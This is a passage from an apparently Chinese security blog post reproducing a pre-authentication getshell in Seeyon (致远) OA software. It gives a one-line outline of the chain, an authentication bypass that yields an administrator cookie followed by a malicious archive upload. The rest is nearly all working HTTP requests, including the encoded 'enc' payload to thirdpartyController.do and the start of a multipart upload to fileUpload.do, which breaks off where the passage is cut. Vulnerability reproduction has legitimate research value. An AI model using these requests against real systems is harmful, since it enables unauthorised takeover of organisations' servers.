# 致远OA 前台getshell 复现
作者: print("") 分类: [漏洞复现](https://www.o2oxy.cn/category/%e5%ae%89%e5%85%a8/%e5%a4%8d%e7%8e%b0) 发布时间: 2021-04-09 17:32 阅读次数: 525 次
首先是一个获取管理cookie的漏洞。然后上传压缩文件进行解压。达到getshell的目的
POST /seeyon/thirdpartyController.do HTTP/1.1
Host: 192.168.10.2
User-Agent: python-requests/2.25.1
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Length: 133
Content-Type: application/x-www-form-urlencoded
method=access&enc=TT5uZnR0YmhmL21qb2wvZXBkL2dwbWVmcy9wcWZvJ04%2BLjgzODQxNDMxMjQzNDU4NTkyNzknVT4zNjk0NzI5NDo3MjU4&clientPath=127.0.0.1
上传压缩包
POST /seeyon/fileUpload.do?method=processUpload HTTP/1.1
Host:192.168.10.2
Connection: close
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.25.1
Cookie: JSESSIONID=3495C4DEF87200EA323B1CA31E3B7DF5
Content-Length: 841
Content-Type: multipart/form-data; boundary=59229605f98b8cf290a7b8908b34616b
--59229605f98b8cf290a7b8908b34616b
Content-Disposition: form-data; name="firstSave"
true
--59229605f98b8cf290a7b8908b34616b
Content-Disposition: form-data; name="callMethod"
resizeLayout
--59229605f98b8cf290a7b8908b34616b
Content-Disposition: form-data; name="isEncrypt"
0
--59229605f98b8cf290a7b8908b34616b
Content-Disposition: form-data; name="takeOver"
false
-
